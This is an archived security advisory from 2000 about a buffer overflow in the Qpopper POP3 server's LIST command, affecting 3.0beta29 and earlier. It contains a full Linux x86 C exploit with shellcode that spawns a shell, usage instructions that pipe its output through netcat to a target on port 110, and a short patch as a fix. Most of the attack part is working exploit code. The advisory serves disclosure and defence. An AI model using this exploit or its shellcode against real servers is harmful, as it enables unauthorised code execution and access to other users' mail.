TUCoPS :: Unix :: General :: qpop3.txt

Qpopper <= 3.0beta29 has a buffer overflow that allows authenticated users to execute arbitrary. 


[ http://www.rootshell.com/ ]

Zhodiac <zhodiac@SOFTHOME.NET>

!Hispahack Research Team
http://hispahack.ccc.de

Program: Qpopper <= 3.0beta29 (2.53 and olders are not vulnerable)
Platform: *nix
Risk: Remote access
Author: Zhodiac <zhodiac@softhome.net>
Date: 20/1/2000


- Problem:
===========

   The, nowadays, so common qpop pop3 server is one of the best server which
implements some features added not in normal pop3d. Like almost all software
it has some security bugs. In this case, once you pass the login process you
can execute malicious code due to a buffer overflow.

   With this buffer overflow (second argument of the LIST command) you can
execute malicious code with the uid of the user you logged in, and with gid
mail. Due to have gid mail, in some systems you can read all the mail of
other users and even change/delete it.


- Exploit:
==========

    For proof of vulnerability we release the Linux x86 xploit. But be
aware, no public xploit for your system does not mean you can't be hacked.
Vulnerability exists, fix it!

------- qpop-xploit.c ----------

/*
* !Hispahack Research Team
* http://hispahack.ccc.de
*
* By Zhodiac <zhodiac@softhome.net>
*
* Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
* Overflow at pop_list()->pop_msg()
*
* Tested: 3.0beta28  offset=0
*         3.0beta26  offset=0
*         3.0beta25  offset=0
*
* #include <standar/disclaimer.h>
*
* This code is dedicated to my love [CrAsH]] and to all the people who
* were raided in Spain in the last few days.
*
* Madrid 10/1/2000
*
*/

#include <stdio.h>

#define BUFFERSIZE 1004
#define NOP 0x90
#define OFFSET 0xbfffd9c4

char shellcode[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
"\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";


void usage(char *progname) {
fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname);
exit(1);
}

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=OFFSET;
int aux;

fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

if (argc<3) usage(argv[0]);

if (argc==4) offset+=atol(argv[3]);

ptr=buffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
ptr+=sizeof(buffer)-strlen(shellcode)-16;
memcpy(ptr,shellcode,strlen(shellcode));
ptr+=strlen(shellcode);
long_ptr=(unsigned long*)ptr;
for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
ptr=(char *)long_ptr;
*ptr='\0';

fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
fprintf(stderr,"Offset: 0x%lx\n\n",offset);

printf("USER %s\n",argv[1]);
sleep(1);
printf("PASS %s\n",argv[2]);
sleep(1);
printf("LIST 1 %s\n",buffer);
sleep(1);
printf("uname -a; id\n");

return(0);
}

------- qpop-xploit.c ---------


- Fix:
======

  Best solution is to wait for a new patched version, meanwhile here you
have a patch that will stop this attack (be aware that this patch was not
done after a total revision of the code, maybe there are some other
overflows).

------ pop_list.patch ---------

77c77
<               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %s",
---
>               return(pop_msg(p, POP_FAILURE,"Unknown LIST argument: %.128s",

------ pop_list.patch ---------

piscis:~# patch pop_list.c pop_list.patch
piscis:~#

Spain r0x

Greets :)

Zhodiac

[ http://www.rootshell.com/ ]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH